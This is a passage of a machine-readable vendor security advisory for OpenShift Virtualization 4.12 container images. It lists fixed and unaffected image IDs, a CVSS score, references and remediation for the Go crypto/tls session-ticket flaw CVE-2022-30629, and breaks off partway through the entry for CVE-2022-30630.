"8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2092793", }, ], notes: [ { category: "description", text: "A flaw was found in the crypto/tls golang package. When session tickets are generated by crypto/tls, it is missing the ticket expiration. This issue may allow an attacker to observe the TLS handshakes to correlate successive connections during session resumption.", title: "Vulnerability description", }, { category: "summary", text: "golang: crypto/tls: session tickets lack random ticket_age_add", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30629", }, { category: "external", summary: "RHBZ#2092793", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2092793", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30629", url: "https://www.cve.org/CVERecord?id=CVE-2022-30629", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30629", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", url: "https://groups.google.com/g/golang-announce/c/TzIC9-t8Ytg", }, ], release_date: "2022-06-02T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 3.1, baseSeverity: "LOW", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Low", }, ], title: "golang: crypto/tls: session tickets lack random ticket_age_add", }, { cve: "CVE-2022-30630", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", 